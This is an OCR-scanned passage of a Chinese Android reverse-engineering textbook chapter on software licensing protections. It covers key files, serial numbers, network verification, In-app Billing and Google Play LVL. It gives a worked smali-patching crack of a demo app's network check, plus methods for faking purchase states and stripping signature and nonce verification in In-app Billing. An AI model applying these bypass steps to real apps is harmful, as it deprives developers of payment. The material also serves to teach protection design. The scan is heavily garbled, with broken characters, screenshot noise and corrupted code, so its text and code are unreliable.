KEY 程 序 的 Context， 并 通过 Context 取 得 它 的 一 个 字符 串 资 源 ， 然 后 对 这 个 
字符 串 解密 后 得 到 一 个 int 值 ， 通 过 这 个 值 来 判断 程序 的 授权 类 型 ， 最 后 根 
据 授权 类 型 来 开启 相应 的 软件 功能 。 如 果 在 获取 Context 的 时 候 发 生 异 常 ， 
说 明 本 机 没有 安装 授权 KEY， 程 序 将 以 “免费 ”模式 运行 。 


掌握 了 整个 授权 的 思路 ， 破 解 起 来 就 很 简单 了 ， 关 键 在 于 getAppKey() 
方法 与 decryptAppKey() 方 法 的 修改 ， 让 它们 永远 返回 合适 的 值 即 可 。 限 于 
篇 幅 ， 修 改 的 过 程 笔者 不 再 详 述 ， 相 关 实 例 的 源码 与 修改 好 的 程序 可 以 在 
本 书 配套 源 代码 中 找到 。 


9.2 序列 号 保护 


序列 号 保护 又 称 为 注册 码 保护 。 通 常 在 购买 这 种 保护 方式 的 软件 时 ， 
用 户 需要 向 软件 作者 提供 注册 信息 (用 户 名 或 机 器 码 ) ， 软 件 作者 通过 自 
己 编写 的 “ 算 号 ”程序 计算 出 注册 码 发 回 给 用 户 ， 用 户 使 用 这 个 注册 码 完成 
整个 注册 过 程 。“ 算 号 ”软件 也 称 为 注册 机 ， 在 计算 可 逆 加 密 算 法 程序 的 注 
册 码 时 ， 它 通常 是 软件 加 密 算法 的 一 个 逆 过 程 。 

序列 号 方式 保护 软件 的 破解 难 易 程度 在 于 软件 作者 的 算法 设计 与 应 用 
方式 上 。 算 法 设计 是 一 门 学 问 ， 需 要 软件 作者 拥有 较 深 的 数学 知识 基底 ， 
现在 大 多 数 的 软件 公司 都 有 一 套 自己 的 注册 算法 ， 通 常 公司 的 所 有 软件 都 
使 用 了 同一 套 注 册 算法 ， 因 此 ， 如 果 其 中 一 个 软件 的 算法 被 破解 ， 也 就 意 
味 公司 整个 系列 的 软件 被 破解 ， 这 是 一 件 很 可 怕 的 事件 ， 公 司 在 算法 设计 
上 可 能 要 下 大 功夫 。 除 了 拥有 强劲 的 算法 ， 还 需要 有 良好 的 注册 验证 技 
巧 ， 一 款 序列 号 保护 的 软件 即使 算法 再 强大 ， 而 验证 上 只 是 做 了 简单 正确 
与 否 的 比较 ， 这 样 的 保护 将 会 是 形同虚设 ，Cracker 只 需 修改 软件 的 跳 转 
(可 能 只 需 一 个 字 节 ) 就 可 以 将 软件 破解 。 在 这 里 笔者 给 出 几 点 序列 号 保 
护 的 建议 : 

1. 序列 号 加 入 机 器 码 验 证 ， 做 到 一 机 一 码 。 

2. 使 用 NDK 编 写 注册 模块 。 将 软件 注册 版 提供 的 功能 进行 加 密 ， 例 如 
对 相关 代码 或 数据 使 用 AES、DES 等 加 密 算 法 进行 加 密 ， 软 件 在 运行 时 检测 
注册 信息 ， 如 果 是 注册 版 用 户 则 根据 注册 信息 生成 正确 的 解密 密 钥 ， 最 后 
使 用 这 个 密 钥 对 注册 版 功能 进行 解密 。 根 据 注册 信息 生成 密 钥 的 一 种 思 
可 以 是 : 在 判断 用 户 注 册 码 正确 的 情况 下 ， 取 注册 码 的 前 8 位 对 其 每 个 字 节 
进行 异 或 运算 ， 然 后 使 用 这 8 位 异 或 后 的 字 节 作为 加 密 密 钥 ， 对 注册 功能 代 


码 的 解密 密 钥 进行 AES/DES 加 密 运算 (AES/DES 的 加 密 密 钥 即 为 解密 密 
tH) ， 将 生成 的 加 密 数 据 写 入 程序 的 配置 文件 (SharedProferences 或 File 都 
可 以 ) ， 软 件 在 运行 时 读 取 该 数据 对 代码 进行 解密 ， 解 密 成 功 即 说 明 是 注 
册 版 用 户 。 

3. 加 入 其 它 类 型 的 保护 方式 。 多 种 保护 方式 比 单一 的 保护 肯定 要 安全 
得 多 。 

4. 其 它 的 保护 建议 请 参看 本 书 第 10 章 介绍 的 反 破 解 技术 。 

本 小 节 不 提供 实例 讲解 ， 前 面 的 章节 如 5.2.1、8.3.1 的 实例 都 是 采用 注 
册 码 保护 ， 读 者 可 以 回头 看 看 前 面 的 章节 来 尝试 自己 编写 注册 机 。 


9.3 “网络 验证 


网 络 验证 是 指 软件 在 运行 时 需要 联网 进行 一 些 验证 。 网 络 连接 方式 可 
以 是 Socket 连 接 与 HTTP 连 接 ， 验 证 的 内 容 可 以 是 软件 注册 信息 验证 、 代 码 
完整 性 验证 以 及 软件 功能 解密 等 。 


9.3.1 网络 验 证 保护 思路 


软件 通过 网 络 向 验证 服务 器 请 求 反 馈 信息 ， 这 些 信息 可 能 是 静态 的 
(例如 服务 器 上 的 某 个 文件 ) ， 也 可 能 是 动态 的 〈 例 如 传递 一 些 特定 的 参 
数 访问 服务 器 的 ASP 或 PHP 肢 本， 服务 器 根据 不 同 的 参数 返回 不 同 的 数 
据 ) ， 还 有 可 能 是 交互 的 〈 例 如 软件 定义 了 一 套 与 服务 器 交互 的 协议 ， 通 
过 Socket 方 式 进行 通信 ) 。 对 于 静态 的 反馈 信息 ， 分 析 人 员 能 够 手动 访问 网 
络 获取 所 有 信息 的 内 容 ， 这 样 的 软件 在 破解 时 相对 简单 ， 只 需要 找到 验证 
点 补丁 上 相应 的 信息 即 可 ;动态 的 反馈 信息 处 理 起 来 则 麻烦 一 些 ， 由 于 无 
法 得 知 完整 的 信息 内 容 ， 就 需要 党 试 构造 不 同 参数 的 信息 来 获取 返回 结 
果 ， 这 可 能 需要 多 次 运行 软件 ， 并 且 效 果 可 能 并 不 理想 ， 尤 其 在 参数 与 反 
馈 信 息 被 加 密 的 情况 下 ， 还 需要 花 大 量 的 时 间 来 对 信息 进行 解密 ;交互 式 
的 网 络 验 证 是 最 难 破解 的 ， 交 互 式 网 络 验证 的 服务 器 能 够 对 信息 进行 更 好 


的 控制 ， 这 种 验证 多 用 于 对 软件 功能 的 保护 以 及 对 软件 使 用 者 合法 性 的 检 
测 上 ， 软 件 功 能 保护 将 软件 的 核心 功能 从 客户 端 转 向 了 服务 端 ， 客 尸 端 软 
件 只 是 成 为 了 一 个 数据 显示 工具 ， 而 合法 性 检测 例如 常见 的 “心跳 包 ” 检 
测 ， 一 旦 软件 与 服务 器 断 开 连接 ， 软 件 就 拒绝 提供 任何 功能 或 者 干脆 停止 


运行 。 
9.3.2 ”实例 破解 一 一 针对 网 络 验证 方式 的 破解 


本 小 节 实 例 为 一 个 静态 网 络 验证 实例 。 在 断 开 网 络 的 情况 下 ， 安 装 并 
运行 实例 程序 network.apk， 运 行 效 果 如 图 9-3 所 示 。 软 件 提示 “该 功能 只 能 在 
网 络 状态 下 使 用 ”。 


Ii 5554: Android2. 3.3 


网 络 验证 演示 程序 


该 功能 只 能 在 网 络 状态 下 使 用 ! 


图 9-3 ”网 络 验证 程序 运行 效果 


设置 连接 网 络 后 ， 运 行程 序 效果 如 图 9-4 所 示 。 


Wi 5554:Android2. 3.3 


网 络 验证 演示 程序 


图 9-4 ”连接 网 络 后 程序 运行 界面 
现在 我 们 的 需求 是 : 让 软件 的 功能 可 以 在 断 网 的 情况 下 继续 (本 实例 
功能 是 从 网 络 上 获取 一 段 加 密 的 字符 串 ， 然 后 解密 显示 ) 。 
既然 软件 会 联网 访问 服务 器 上 的 数据 ， 那 么 我 们 就 先 来 找 出 服务 器 的 
地 址 。 除 了 使 用 静态 分 析 查 找 服务 器 地 址 外 ， 还 可 以 通过 网 络 抓 包 的 方式 
来 获取 ， 网 络 抓 包工 具 可 以 使 用 Android 移 植 版 的 tcpdump 工 具 ， 该 工具 在 


Android 模 拟 器 的 /system/xbin 目录 下 ， 源 码 位 于 Android 系 统 源 码 的 
externaltcpdump El Ro 


执行 以 下 命令 开始 抓 包 。 


adb shell tcpdump -p -vv -s 0 -w /sdcard/capture.pcap 


回 到 程序 的 界面 ， 点 击 “ 执 行 功能 ”按钮 ， 然 后 回 到 命令 提示 窗口 按 下 


CTRL+C 停 止 抓 包 ， 然 后 执行 以 下 命令 导出 包 文 件 。 
adb pull /sdcard/capture.pcap 


Z F Wireshark 网 络 分 析 工 具 ， 可 以 通过 其 官网 在 以 下 网 址 
http://www.wireshark.org/download.html 下 载 安 装 。 安 装 完成 后 直接 双击 
capture.pcap 文 件 ， 会 启动 Wireshark 显 示 数 据 包 的 内 容 ， 查 找 绿 色 的 HTTP 与 
TCP 数据 包 ， 最 终 发 现 访 问 的 网址 为 http://com-droider- 
network.googlecode.com/svn/info.txt， 效 果 如 图 9-5 所 示 。 


T capture. pcap [Wireshark 1.8.2 (SVN Rev 44520 from /trunk-1.8)] 

He Edit View Go Capture Analyze Statistics Telephony Tool Intemals Help 

B a ài e a gEuXx23!u99m-3T72£z: BIS GQQ«G«Em,.xxmsu 
Filter: || | Expression... Clear Apply Save 


Time Destination Protocol Length Info 
16 1.981747 i .128. 82 10.0.2.15 TCP 64 http > 37571 [SYN, ACK] Seq-0 Ack-1 win-8192 


17 1.982310 .0.2.15 74.125.128.82 TCP 54 37571 > http [ack] seq=1 Ack=<1 Win=5840 Len=0 - 
18 2.044675 .0.2.15 74.125.128.82 HTTP 150 GET /svn/Ánfo.txt HTTP/1.1 
.045099 .125.128.82 10.0.2.15 TCP 64 http > 37571 [ACK] Seq-1 Ack-97 win-8760 Len=( 
255310 .0.2.15 10.0. TCP 85 personal-agent > taurus-wh [PSH, ACK] seq-162 
.255470 20:2.2 10. 5 TCP 64 taurus-wh > personal-agent [ACK] Seq=73 Ack-1t 
.324389 0:212 10. 5 TCP 78 taurus-wh > personal-agent [PSH, ACK] Seqe73 £ 
2236£&15 15 1n Tro KA narcenonslocamanmt ~ tairne- wh larvi San-1c2 arb-t 


* ; Transmission Control Protocol, Src Port: 37571 (37571), Dst Port: http (805, "Seg: A1; Ack; s Len: 96 ^ 


- Hypertext Transfer Protocol 
+ GET /svn/info.txt HTTP/1.1Xr^n 
Host: com-droider-network.googlecode.com*Mrn 
Connection: Keep-Allvewr*n 
NrAn 
[Full request URI: EE E oona lacode, DARE RET 


.5.RT ..4V..E. 
30:0. jJ. a 


. Pp 。 Be T $e 
nfo.txt HTTP/1.1 

.Host:  com-droi 
der-netw ork. goog 
lecode.c om..Conn 
ection: Keep-Ali 
Ve... 


et The ful requested URI (including host na... I Packets: 78 Displayed: 78 Marked: 0 Load time: 0:00.630- j Profle: Default 
图 9-5 “使 用 Wireshark 分 析 数 据 包 
在 浏览 器 中 打开 这 个 网 址 ， 发 现 内 容 如 下 。 


*"info*:( 
"key":"droider", 
"msg":"2970C000324690E4AC28850CC2E4D36C6713FE28F48BD03D442AE1845 
CBDF16EA68CEDB67F8E90C6D47BB4C7F492322056C4A6B56BA1633BDCF9715850 
E77B18" 


) 

这 段 内 容 是 固定 写 死 的 ， 也 就 是 说 ， 每 次 软件 访问 这 个 网 址 后 反馈 的 
数据 是 相同 的 ， 因 此 ， 我 们 可 以 去 掉 网 络 访问 的 代码 ， 直 接 将 其 改 为 以 上 
的 文本 内 容 ， 即 可 达到 “本 地 化 ”的 目的 。 修 改 方法 如 下 : 反 编 译 
network.apk ， 打 开 smali\com\droider\network\MainActivity$1.smali 文 件 ， 找 
到 OnClick() 方 法 后 清空 所 有 的 内 容 ， 仅 保留 最 后 access$2() 方 法 的 调用 ， 修 
改 后 的 代码 如 下 。 

.method public onClick(Landroid/view/View;)V 

.locals 1 

.parameter "v" 

.prologue 

:cond 0 

iget-object v0, p0, Lcom/droider/network/MainActivity$1; 
-»this$0:Lcom/droider/network/MainActivity; 

invoke-static (v0), Lcom/droider/network/MainActivity; 
-»access$2(Lcom/droider/network/MainActivity;)V 

return-void 


.end method 
打开 smali\com\droidernmetwork\MainActivity.smali 文 件 ， 找 到 getData() 方 
法 后 去 掉 HttpUtils 类 的 getStringFromURLO 调 用 ， 然 后 修改 代码 如 下 。 


.method private getData()V 

.locals 5 

.prologue 

.line 42 

const-string v1, "(MrMnNtN"infoN": (NrNAnNENCEN"keyN" :V"droider V", NxMAnNEN 

tX"msgV" :N"2970C000324690 
E4AC28850CC2E4D36C6713FE28F48BD03D442AE1845CBDF16EA68CEDB67F8E90 
C6D47BB4C7F492322056C4A6B56BA1633BDCF9715850E77B18NV "Nr Mn NC) NrN 
n)NrMn" 

.line 43 

invoke-virtual (v1), Ljava/lang/String;-»length()I 

move-result v3 

if-nez v3, :cond 1 

.line 44 

:cond 0 

iget-object v3, p0, Lcom/droider/network/MainActivity;-»txt info:Landroid/ 

widget/TextView; 

const/highl6 v4, -0x1 


.end method 


将 返回 的 字符 串 数 据 赋值 给 v1 寄 存 器 ， 这 样 就 与 从 网 络 上 获取 数据 后 
返回 的 结果 是 一 样 的 了 。 将 修改 后 的 代码 保存 并 重新 编译 生成 
network.apk， 安 装 测试 发 现 程 序 已 经 可 以 脱离 网 络 运 行 了 。 


9.4 In-app Billing (应 用 内 付费 ) 


Android In-app Billing 又 称 为 应 用 内 付费 ， 是 Android 提 供 的 一 种 应 用 付 
费 模 式 ， 本 小 节 将 介绍 In-app Billing 的 使 用 方法 以 及 如 何 破 解 它们 。 


9.4.1 In-app Billing 原 理 


Android 允 许 用 户 在 软件 使 用 过 程 中 向 软件 作者 支付 费用 。 我 们 先 来 看 
看 使 用 该 项 服务 的 限制 。 

e 程序 只 能 通过 Google Play 发 布 

e 开发 人 员 必 须 有 Google Checkout 账 户 


e 必须 安装 2.3.4 版 本 或 以 上 的 Google Play 商店 

e Android 1.6 以 上 设备 支持 

e 只 能 用 于 购买 虚拟 商品 

e 必须 能 够 通过 网 络 访问 Google Play 服务 器 

以 上 为 Google 官 方 的 硬性 规定 ， 实 际 上 还 有 很 重要 的 一 条 ， 那 就 是 当 
地 法 律 法 规 的 支持 。 在 中 国 ， 目 前 是 无 法 使 用 Google Play 商店 来 购买 程序 
的 ， 这 意味 着 In-app Billing 在 中 国内 地 的 Android 程 序 中 是 无 法 使 用 的 。 

图 9-6 展 示 了 In-app Billing 是 如 何 与 Google Play 服务 器 进行 通讯 的 。 一 
个 实现 了 In-app Billing 服 务 的 程序 可 以 包含 以 下 5 个 组 件 (这 些 组 件 并 非 
Android SDK 提 供 ， 而 是 需要 开发 人 员 自 己 编写 ) ， 它 们 分 别 是 : 

BillingReceiver: 从 Google Play 接 收 异步 的 账单 处 理 的 应 答 。 

BillingService: 处 理 软件 的 购买 消息 以 及 发 送 付款 请 求 。 

Security: 执行 安全 相关 的 任务 ， 如 签名 验证 与 随机 数 生 成 等 。 

ResponseHandler: 提供 程序 特定 的 购买 提示 、 错 误 和 其 他 状态 消息 的 
处 理 。 

PurchaseObserver: 负责 发 送 回调 消息 给 程序 ， 以 便 对 界面 上 的 购买 信 
息 和 状态 进行 更 新 。 


Market Server 
Checkout flow 
Product list 


Transaction data 
(if managed) 


Your Application 


BillingReceiver 


startService() 


Your Server 
(Optional) 


Content delivery 


Purchase data 


图 9-6 In-app Billing Google Play Server 进 行 通讯 


In-app Billing 服 务 的 实现 步骤 可 以 参考 Android SDK extras\google 目 录 下 
的 play_billing 实 例 。 首 先 自 定义 BillingReceiver、BillingService、 Security. 
ResponseHandler、PurchaseObserver 五 个 组 件 。BillingReceiver 就 是 一 个 普通 
的 广播 接收 者 ， 它 继承 自 BroadcastReceiver， 主 要 负责 接收 Google Play 发 送 
过 来 的 广播 信息 ; BillingService 继 承 自 Service 并 实现 了 ServiceConnection ， 
它 有 一 len m e i 型 的 成 员 mService， 主 要 负责 通过 AIDL 的 
方式 来 与 Google Play 进行 通讯 ， 其 中 EN Qe ds UE 法 
用 来 响应 p a EE 3X; Security FB 
来 生成 、 移 除 以 及 管理 随机 数 ， 并 提供 了 随机 数 与 JSON 字 符 串 的 验证 ; 
ResponseHandler 主 要 提供 一 些 静 态 方法 与 PurchaseObserver 进 行 通 讯 ; 
PurchaseObserver 主 要 负责 程序 的 UI 更 新 。 

程序 启动 时 开启 Billingservivelk a A esponse Handl er ak 然后 
调用 sendBillingRequest() 方 法 通过 IPC 机 制 向 Google Play 发 送 请 求 信 息 。 请 
求 信 息 可 以 是 : 

e CHECK BILLING SUPPORTED: 检测 是 否 支 持 In-app Billings 

e REQUEST PURCHASE: 发 送 购买 信息 。 

e GET PURCHASE INFORMATION: 购买 成 功 、 取 消 、 退 款 等 状态 
发 生 时 ， 提 示 应 用 程序 。 

e CONFIRM NOTIFICATIONS: 确认 通知 。 

e RESTORE TRANSACTIONS: 获取 已 购买 的 状态 。 

程序 最 先 发 送 CHECK_BILLING_SUPPORTED 检 查 运 行 环境 是 否 支持 
dd Billing。 请求 被 Google Play 处 理 后 ，MarketBillingService 会 向 程序 发 

送 广播 信息 ， 这 些 信 aao |， 接收 到 广播 后 检查 相关 

Intent 的 Action， 它 的 值 通常 

com.android.vending.billing.RESPONSE CODE: 获取 这 个 Action 后 ， 通 
常 将 它 传 给 BillingService， 后 者 会 调用 ResponseHandler 来 处 理 它 (可 以 显示 
其 状态 ， 也 可 以 什么 都 不 做 ) 。 

com.android.vending.billing.IN_APP_NOTIFY : 处 理 它 的 方法 通常 是 给 
BillingService 传 递 一 个 包含 GET_PURCHASE O n. 后 


者 会 发 送 请 求 去 获得 消息 的 详细 内 容 。 

com.android.vending.billing.PURCHASE_STATE_CHANGED: 收 到 这 个 
Action 表明 收 到 了 Google Play 传 过 来 的 应 答 消 息 。 应 答 信 息 使 用 
inapp_signed_data 传 递 了 一 个 JSON 格 式 的 字符 串 数据 ， 例 如 一 个 订购 信息 
的 应 答 可 能 如 下 : 


{ "nonce" : 1836535032137741465, 
"orders" 

[( "notificationId" : "android.test.purchased", 
"OrderId" : "transactionId.android.test.purchased", 
"packageName" : "com.example.dungeons", 

"productId" : "android.test.purchased", 
"developerPayload" : "bGoa-4V7g/yqDXvKRqq-*JTFn4duQZbPiQJo4pf9RzJ", 
"purchaseTime" : 1290114783411, 
"purchaseState" : O0, 
"purchaseToken" : "rojeslcdyyiapnqcynkjyyjh" )] 
) 


应 答 信 息 还 通过 inapp_signature 传 回 JSON 字 符 串 的 签名 信息 。 每 个 请 》 
在 发 送 时 会 附带 一 个 自动 生成 的 随机 数 (由 开发 人 员 提 供 生成 与 管理 ) ， 
收 到 应 答 信 息 后 这 个 随机 数 也 一 同 被 回 传 ， 程 序 中 应 该 要 对 随机 数 

(nonce) 与 JSON 字 符 串 的 签名 进行 验证 ， 以 确保 数据 在 传输 过 程 中 没有 被 
非法 算 改 。 这 个 验证 工作 就 是 前 面 所 说 的 Security 组 件 要 做 的 事 。 

验证 过 程 会 解析 JSON 字 符 串 ， 完 成 后 会 返回 一 个 VerifiedPurchase 列 
表 ， 里 面包 含 了 所 有 已 经 验证 的 付费 软件 信息 。 最 后 调用 ResponseHandler 
类 的 purchaseResponse() 方 法 对 其 进行 响应 ， 后 者 调用 PurchaseObserver 类 的 
postPurchaseStateChange() 更 新 程序 UI， 例 如 程序 还 没有 被 购买 可 以 提示 用 
户 购 买 ， 如 果 用 户 同 意 就 发 送 REQUEST_PURCHASE 消 息 。 

最 后 ， 使 用 In-app Billing 服 务 需要 在 AndroidManifest.xml 文 件 中 加 入 相 
应 的 权限 ， 代 码 如 下 。 


«uses-permission android:name="com.android.vending.BILLING" /> 


9.4.2 ”In-app Billing 破 解 方 法 


在 上 一 小 节 中 ， 我 们 看 到 In-app Billing 相 关 的 功能 实现 都 是 Java 代 码 。 
而 且 只 有 一 个 Security 组 件 对 应 答 信息 进行 验证 。 下 面 我 们 看 看 可 以 从 哪些 
环节 来 破解 In-app Billing 类 型 的 软件 。 

通常 软件 作者 的 思路 是 当 用 户 需 要 开启 软件 某 功 能 的 时 候 ， 向 用 户 弹 
出 提示 需要 购买 此 功能 ， 然 后 引导 用 户 进入 付款 页 面 进行 购买 ， 购 买 成 功 
后 软件 会 检查 是 否 购买 成 功 ， 如 果 购 买 成 功 就 开启 软件 的 收费 功能 ， 整 个 
流程 如 图 9-7 所 示 。 
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图 9-7 In-app Billing 工 作 流 程 
上 图 9-7 显 示 的 流程 图 中 有 四 个 条 件 判 断 ， 分 别 是 已 经 购买 、 同 意 购 


买 、 付 款 成 功 、 购 买 成 功 。 下 面 分 别 从 已 经 购买 与 购买 成 功 两 个 条 件 判 断 
入 手 来 破解 In-app Billing 类 型 的 程序 。 


首先 是 程序 如 何 判断 收费 功能 已 经 被 用 户 购买 ， 通 常 使 用 m-app Billing 
服务 的 软件 都 提供 了 多 项 收费 功能 ， 如 果 使 用 每 个 功能 时 都 联网 检查 软件 
的 收费 状态 ， 势 必 会 影响 到 软件 运行 时 的 性 能 ， 同 时 还 会 耗费 用 户 有 限 的 
手机 流量 ， 很 显然 不 是 明智 之 举 。 这 种 情况 下 一 般 软 件 开 发 人 员 会 将 所 有 
的 软件 收费 功能 做 成 一 个 列表 ， 使 用 本 地 存储 的 方式 来 保存 各 功能 的 收费 
状态 ， 在 软件 初始 化 时 读 取 它 们 的 状态 并 设置 相应 的 值 。 这 样 问题 就 出 现 
了 ， 如 果 在 本 地 存储 中 构造 虚假 的 购买 状态 信息 ， 那 么 软件 运行 时 相应 的 
收费 功能 不 就 显示 已 购买 了 吗 ? 答案 是 肯定 的 。 因 此 ， 本 地 存储 的 软件 购 
买 数据 如 果 不 进 行 加 密 就 可 以 简单 地 被 绕 过 ， 从 而 实现 不 改动 软件 一 个 字 
节 就 将 程序 破解 掉 (前 提 条 件 是 能 够 读 写 软件 的 本 地 存储 数据 ， 例 如 用 户 
能 够 获取 root 权 限 ) ! 

如 果 本 地 数据 被 加 密 或 者 用 户 无 法 获取 root 权 限 ， 又 或 者 程序 没有 使 用 
本 地 存储 ， 每 次 使 用 这 些 功 能 都 需要 联网 购买 ， 第 一 种 破解 方法 就 会 失 
效 。 这 种 情况 下 可 以 尝试 阅读 提示 购买 页 面 的 代码 ， 然 后 修改 购买 按钮 的 
功能 人 代码， 通常 这 段 代码 会 引导 用 户 转 到 Google 钱 包 页 面 进行 交 费 ， 购 买 
成 功 后 会 向 软件 发 送 Action 为 PURCHASE_STATE_CHANGED 的 广播 ， 软 件 
收 到 广播 后 传递 给 BillingService 与 Security 进 入 处 理 与 验证 ， 最 后 通过 判断 
purchaseState 的 值 来 决定 软件 是 否 购买 成 功 。 现 在 思路 又 来 了 ， 首 先是 构造 
JSON 字 符 串 ， 手 动 给 软件 发 送 Action 为 PURCHASE_STATE_CHANGED 的 
广播 ， 这 个 简单 ， 编 写 一 个 小 程序 即 可 ， 然 后 是 修改 Security 的 验证 代码 ， 
把 关于 随机 数 与 JSON 字 符 串 签名 的 代码 全 部 删除 ， 然 后 设置 
VerifiedPurchase 列 表 中 每 个 成 员 的 purchaseState 值 都 为 PURCHASED ， 这 样 
只 要 软件 收 到 付费 状态 改变 的 广播 ， 都 会 认为 软件 购买 成 功 ， 从 而 完美 地 
绕 过 了 付费 环节 。 

从 上 面 两 种 破解 In-app Billing 软 件 的 方法 来 看 ， 这 种 应 用 内 付费 的 机 制 
本 身 没 有 问题 ， 但 由 于 所 有 的 状态 检查 与 验证 都 是 由 Java 代 码 来 完成 ， 而 且 
都 是 由 软件 自身 来 控制 ， 这 就 给 Cracker 带 来 了 很 大 的 “活动 空间， 直接 导 
致 了 软件 轻易 就 被 破解 。 

本 小 节 不 提供 实例 讲解 ， 有 兴趣 的 朋友 请 自行 研究 。 


9.5 Google Play License 保 护 


除了 使 用 In-app Billing 方 式 进行 应 用 内 付费 外 ，Android 还 支持 使 用 
License 来 保护 自己 的 软件 。Android 的 License 保 护 同 样 有 着 自己 的 一 套 机 
制 。 


9.5.1 Google Play License 保 护 机 制 


Google 官 方 提供 了 Android 应 用 商店 Google Play， 用 户 可 以 在 Google 
Play 中 下 载 免费 或 者 收费 的 软件 。 使 用 Google Play 服 务 有 如 下 限制 条 件 : 

e Google Play 是 基于 网 络 的 服务 。 

e 手机 上 必须 安装 Google Play 商店 应 用 程序 。 

e 手机 设备 必须 与 一 个 Google 账 号 绑 定 ，Google Play 通过 该 账号 查询 
已 经 下 载 或 购买 的 软件 信息 。 

在 手机 上 设 定 Google 账 号 需要 手机 中 安装 有 Google 服 务 包 ， 然 而 大 部 
分 手机 在 出 厂 时 并 没有 附带 该 服务 包 ， 用 户 手动 安装 它 需 要 手机 能 够 获取 
root 权 限 ， 这 意味 着 没有 root 权 限 的 手机 通常 不 能 使 用 该 项 服务 。 另 外 ， 限 
于 国内 的 法 律 约束 ， 用 户 无 法 在 Google Play 商店 中 购买 收费 软件 ， 只 能 下 
载 部 分 区 域 的 免费 软件 。 

Android 的 License 保 护 是 通过 License Verification Library (License 验 证 
库 ， 以 下 简称 为 LVL) 来 实现 的 。LVL 实 现 了 一 套 与 Google Play 商店 apk 

( com.android.vending ) 通信 的 机 制 ，LVL 通 过 Binder 机 制 调 用 

com.android.vending.licensing 的 checkLicense() 方 法 ， 后 者 会 连接 Google Play 
验证 服务 器 ， 从 软件 发 布 者 数据 库 中 查询 用 户 的 购买 状态 ， 然 后 回 传 信息 
给 Google Play 商店 apk 程 序 ， 最 后 apk 程 序 调用 程序 设置 的 回调 方法 来 处 理 程 
序 的 购买 状态 ， 整 个 验证 过 程 如 图 9-8 所 示 。 


Google Play 验证 服务 器 


软件 发 布 者 数据 库 
应 用 程序 应 用 程序 列表 
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应 用 程序 Activity < 
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应 用 程序 RA 
O ES 
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LVL | XS 
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应 用 程序 Activity 


图 9-8 LVL 验 证 机 制 


然而 ，LVL 并 不 是 一 个 固定 的 SDK 库 ，Google 允 许 开 发 人 员 自 己 实现 
LVL 验 证 库 。 安 装 Android SDK 时 ， 在 SDK Manager 中 勾 选 Extras 下 的 Google 
Play Licensing Library 可 以 下 载 到 一 份 Google 提 供 的 LVL 库 实例 ， 开 发 人 员 
不 需要 修改 它 的 代码 就 可 以 应 用 到 软件 中 去 。 下 面 我 们 来 看 看 实现 LVL 需 
遵守 哪些 规范 。 

一 个 最 简单 的 LVL 需 要 实现 以 下 的 接口 与 方法 : 
e Policy 
Policy 接 口 用 于 检测 软件 的 购买 状态 。 软 件 的 状态 可 以 是 LICENSED 
(已 购买 ) 、NOT_LICENSED (未 购买 ) 或 者 RETRY 〈 重 试 ) ， ode 

味 着 软件 的 Lincese 状 态 无 法 访问 ， 通 常 是 未 安装 Google 服 务 包 或 者 网 络 
通 。Policy 接 口 定 义 了 两 个 方法 : processServerResponse()FB S RT 
回 的 响应 数据 ，allowAccessO 用 于 检查 用 户 是 否 有 权限 运行 本 软件 。 


e LicenseCheckerCallback 
LicenseCheckerCallback 接 口 定义 了 Lincese 检 查 器 的 回调 方法 。allow0) 
方法 通常 在 软件 状态 为 PolicyLICENSED 或 PolicyRETRY 时 调用 ， 
dontAllowO 通 常 在 软件 状态 为 Policy.LICENSED 或 PolicyRETRY 时 调用 ， 
applicationError (0) 通 常 在 发 生 网 络 故障 或 软件 运行 出 现 安全 异常 时 调用 。 
e Obfuscator 
Obfuscator 接 口 用 于 混淆 处 理 本 地 存储 的 软件 购买 状态 。 当 从 Google 
Play 验证 服务 器 上 获取 到 软件 的 购买 状态 后 〈 例 如 已 经 购买 ) ， 可 以 将 其 状 
态 保存 到 本 地 文件 中 ， 通 常 使 用 SharedProferences 保 存 到 软件 的 私有 数据 目 
is 软件 运行 时 可 以 先 检 查 它 的 内 容 来 确定 是 否 已 经 购买 ， 而 不 必 每 次 运 
行 时 都 联网 检查 。Obfuscator 接 口中 的 方法 obfuscate() 与 unobfuscate() 就 是 用 
i 与 解密 。 
e LicenseChecker E LicenseValidator 
LicenseChecker 类 用 于 License 的 检查 与 验证 ， 验 证 的 工作 通常 由 单独 的 
类 LicenseValidator 来 完成 。LicenseValidator 主 要 验证 Google Play 验证 服务 器 
返回 的 响应 数据 ， 并 调用 传 入 的 callback 对 象 (LicenseChecker 类 中 声明 的 
LicenseCheckerCallback 接 口 ) 的 相应 方法 处 理 不 同 的 License 状 态 。 
以 上 的 接口 与 类 在 Android SDK\extras\google 目 录 下 的 play_licensing 示 
例 项 目 中 都 有 完整 的 实现 ， 读 者 可 以 阅读 其 接口 与 方法 实现 来 加 强 理 解 。 


v 实例 破解 一 一 针对 Google Play License 方 式 的 
ag 


在 上 面 小 节 的 介绍 中 ， 笔 者 介绍 了 LVL 中 需要 实现 的 框架 接口 以 及 它们 
需要 实现 的 功能 。 从 接口 的 功能 来 看 ， 破 解 LVL 可 以 从 Policy 接 口 与 
LicenseChecker 接 口 入 手 ， 为 什么 是 这 样 的 呢 ? 让 我 们 分 析 看 看 。 

按照 LVL 框 架 的 实现 思路 ，Policy 是 由 LicenseChecker 调 用 的 ， 负 责 调用 
Obfuscator 接 口 的 unobfuscate() 方 法 来 获取 软 的 JERS, Rm 
allowAccess() 方 法 来 告诉 LicenseChecker 软 件 是 经 被 购买 。 毫 无 疑问 ， 


如 果 安 装 的 是 未 经 过 购买 的 收费 Android 软 件 《例如 从 非 谷歌 商店 的 其 它 渠 
道 获取 ) ， 软 件 启动 并 读 取 购买 信息 时 ，Obfuscator 的 unobfuscate() 方 法 会 
调用 失败 ， 这 时 allowAccess() 会 返回 假 ， 表 明 检 测 本 地 购买 状态 失败 ， 
LicenseChecker 此 时 会 调用 LicenseValidator 接 口 去 联网 检查 License 信 息 ， 验 
证 购买 信息 时 会 向 LVL 验 证 服务 器 提交 软件 与 设备 的 相关 信息 ， 如 果 是 正常 
购买 了 该 软件 的 用 户 ， 会 返回 购买 成 功 的 信息 (本 地 检测 失败 ， 而 联网 验 
证 成 功 ， 这 种 情况 通常 会 在 手机 刷机 之 后 重新 安装 该 软件 时 发 生 ) ， 并 通 
过 Obfuscator 接 口 的 obfuscate() 方 法 将 结果 保存 下 来 ， 以 便 下 次 启动 程序 时 
不 需要 联网 检查 ， 如 果 是 未 经 授权 的 用 户 ， 返 回 的 信息 则 是 未 授权 ， 同 
样 ， 这 些 信息 也 会 经 过 加 密 后 保存 在 手机 的 存储 设备 中 。 

